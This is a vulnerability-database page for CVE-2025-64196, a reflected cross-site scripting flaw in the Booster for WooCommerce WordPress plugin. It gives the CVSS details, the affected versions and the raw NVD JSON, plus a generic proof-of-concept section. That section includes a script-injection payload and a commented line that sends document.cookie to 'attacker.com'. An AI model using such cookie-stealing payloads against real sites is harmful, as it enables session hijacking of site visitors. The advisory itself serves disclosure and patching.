Security Vulnerability Report
中文
CVE-2025-64196 CVSS 7.1 HIGH

CVE-2025-64196

Published: 2025-11-06 16:16:14
Last Modified: 2026-01-20 15:18:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Reflected XSS.This issue affects Booster for WooCommerce: from n/a through <= 7.2.5.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:* - VULNERABLE
Booster for WooCommerce <= 7.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64196 Reflected XSS PoC for Booster for WooCommerce --> <!-- Target: WordPress site with Booster for WooCommerce plugin <= 7.2.5 --> <!-- Basic PoC - Injecting script via vulnerable parameter --> <!-- Replace YOUR_TARGET_URL with the vulnerable site URL --> <script> // Malicious URL construction const targetUrl = 'YOUR_TARGET_URL'; const maliciousPayload = '<script>alert(document.cookie)</script>'; // Construct the exploit URL // Note: Actual parameter name needs to be identified from vulnerable endpoint const exploitUrl = targetUrl + '?param=' + encodeURIComponent(maliciousPayload); console.log('Exploit URL:', exploitUrl); // For demonstration - open the malicious URL // window.location.href = exploitUrl; </script> <!-- Alternative PoC using event handlers --> <!-- <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> --> <!-- Real-world attack URL structure --> <!-- https://victim-site.com/?wcj-ajax=some_action&param=<script>malicious_code</script> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64196", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:13.837", "lastModified": "2026-01-20T15:18:41.987", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Reflected XSS.This issue affects Booster for WooCommerce: from n/a through <= 7.2.5."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización incorrecta de la entrada durante la generación de páginas web ('Cross-Site Scripting ') en Pluggabl Booster for WooCommerce woocommerce-jetpack permite XSS reflejado. Este problema afecta a Booster for WooCommerce: desde n/a hasta menor igual que 7.2.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.2.6", "matchCriteriaId": "42B0DAD6-7B0F-4FF4-92DE-864D7F478AB9"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-jetpack/vulnerability/wordpress-booster-for-woocommerce-plugin-7-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}